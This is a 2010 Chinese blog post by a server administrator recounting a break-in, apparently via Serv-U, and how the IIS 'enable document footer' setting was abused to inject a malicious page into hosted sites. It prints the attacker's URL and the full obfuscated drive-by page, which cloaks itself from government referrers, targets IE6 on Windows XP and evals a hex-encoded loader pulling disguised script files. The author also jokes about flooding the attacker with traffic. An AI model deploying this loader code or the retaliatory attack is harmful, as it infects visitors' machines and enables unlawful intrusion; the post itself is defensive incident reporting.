当前位置: 首页 > 我的创作 > 正文

解决IIS 无法加载JavaScript文件

昨天服务器被人入侵了,经过排查,估计是通过Serv-U提权,然后进行控制的。原本只为方便,没想到啊。长记性了!

发现网站被挂马后,立即对服务器进行处理,恢复WEB备份。并且对系统的权限进行重新加固处理,完全卸载Serv-U,FTP工具使用Gene6 FTP Server,无论是在安全性还是在功能上都比Serv-U更胜一筹。

 

处理过程中,发现程序的挂马已经完全清除了,但奇怪的是还是会出现木马提示,并且程序的JS文件都无法加载。个人是感觉可能启用了IIS文档页脚,但仔细查看,发现只有几个访问量大的网站被勾选了。马上在网站总设置中取消掉 "启用文档页脚",便处理了挂马问题。

 

 

搜索C盘,发现IIS.HTM这个文件被挂马,也就是"启用文档页脚"的设置路径中的文件。

通过构建大小为0的网页进行挂马操作。

挂马网址:http://wdww.0395e.com.cn:2000/360/2020/index.htm

看文章的千万别点哦。竟然用CN域名来,并且解析到美国去。他完了 我流量攻击死他。日

 

附上整个挂马网页代码:

XML/HTML代码
        

  1. <html>  
  2.     

  3. <SCRIPT LANGUAGE="JavaScript">    
  4.     

  5. <!– Hide    
  6.     

  7. function killErrors() {    
  8.     

  9. return true;    
  10.     

  11. }    
  12.     

  13. window.onerror = killErrors;    
  14.     

  15. // —>    
  16.     

  17. </SCRIPT>  
  18.     

  19.   
  20.     

  21.   
  22.     

  23.   
  24.     

  25. <script>  
  26.     

  27. //var parent_url = window.parent.location.href.toLowerCase();   
  28.     

  29. var where = document.referrer.toLowerCase();   
  30.     

  31. var self_url = document.location.href.toLowerCase();   
  32.     

  33. if(where.indexOf("gov.")>=0 || where == "")   
  34.     

  35. {   
  36.     

  37.     location.replace("about:blank");   
  38.     

  39. }   
  40.     

  41. </script>  
  42.     

  43.   
  44.     

  45.   
  46.     

  47. <script>  
  48.     

  49. nav=navigator.userAgent.toLowerCase();   
  50.     

  51. wxp=((nav.indexOf('\x77\x69\x6e\x64\x6f\x77\x73\x20\x6e'+'\x74\x20\x35\x2e\x31')!=-1)||(nav.indexOf   
  52.     

  53. ('windows xp')!=-1));   
  54.     

  55. if(!wxp||navigator.userAgent.toLowerCase().indexOf("\x6D"+"\x73"+"\x69\x65 \x36")==-1)    
  56.     

  57. location.replace("about:blank");   
  58.     

  59. </script>  
  60.     

  61.   
  62.     

  63.   
  64.     

  65. <script language="JavaScript">  
  66.     

  67. window.onerror=function(){return true;}   
  68.     

  69. if(document.cookie.indexOf("CoreBeta=")==-1)   
  70.     

  71. {   
  72.     

  73.   
  74.     

  75. var expires=new Date();   
  76.     

  77. expires.setTime(expires.getTime()+24*60*60*1000);   
  78.     

  79. document.cookie="CoreBeta=Yes;path=/;expires="+expires.toGMTString();   
  80.     

  81. document.writeln("<html> ");   
  82.     

  83. document.writeln("<body style=\"overflow-y:hidden\" scroll=\"no\" oncontextmenu=\"return false\">  ");   
  84.     

  85.   
  86.     

  87. var code="\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x6c\x6e\x28\x22\x3c\x64\x69\x76\x20\x69\x64\x3d\x5c\x22\x44\x69\x76\x49\x44\x5c\x22\x3e\x20\x22\x29\x3b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x6c\x6e\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x5c\x27\x61\x2e\x6a\x70\x67\x5c\x27\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x20\x20\x22\x29\x3b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x6c\x6e\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x5c\x27\x63\x2e\x6a\x70\x67\x5c\x27\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x20\x22\x29\x3b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x6c\x6e\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x5c\x27\x64\x2e\x63\x73\x73\x5c\x27\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x20\x20\x22\x29\x3b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x6c\x6e\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x5c\x27\x65\x2e\x6a\x70\x67\x5c\x27\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x20\x20\x22\x29\x3b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x6c\x6e\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x5c\x27\x66\x2e\x63\x73\x73\x5c\x27\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x20\x20\x22\x29\x3b";   
  88.     

  89.   
  90.     

  91. eval(code);   
  92.     

  93.   
  94.     

  95. document.writeln("<\/body> ");   
  96.     

  97. document.writeln("<\/html>");   
  98.     

  99. }   
  100.     

  101. else   
  102.     

  103. location.replace("about:blank");   
  104.     

  105. </script>  
  106.     

  107.   
  108.     

  109.   
  110.     

  111. <script language="javascript">  
  112.     

  113.   
  114.     

  115. var lessen50;   
  116.     

  117.   
  118.     

  119. function rand()   
  120.     

  121. {   
  122.     

  123.     var num = Math.random()*100;   
  124.     

  125.        
  126.     

  127.     return num;   
  128.     

  129.   
  130.     

  131. }   
  132.     

  133.   
  134.     

  135. var num = rand();   
  136.     

  137. if(num <= lessen)   
  138.     

  139. {   
  140.     

  141. }   
  142.     

  143. else   
  144.     

  145. {   
  146.     

  147.   
  148.     

  149. document.writeln("<script type=\"text/javascript\" src=\"http://js.tongji.linezing.com/1399654/tongji.js\"><\/script>");   
  150.     

  151. }   
  152.     

  153.   
  154.     

  155. document.writeln("<script type=\"text/javascript\" src=\"http://js.tongji.linezing.com/1389409/tongji.js\"><\/script>");   
  156.     

  157.   
  158.     

  159. </script>  
  160.     

  161.   
  162.     

  163.   
  164.     

  165.   
  166.     

  167.   
  168.     

  169. </html>   

 

本文固定链接: http://blog.ich8.com/post/129 | 霸王硬上弓's Blog

avatar
该日志由 霸王硬上弓 于2010年01月12日发表在 我的创作 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: 解决IIS 无法加载JavaScript文件 | 霸王硬上弓's Blog

解决IIS 无法加载JavaScript文件:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!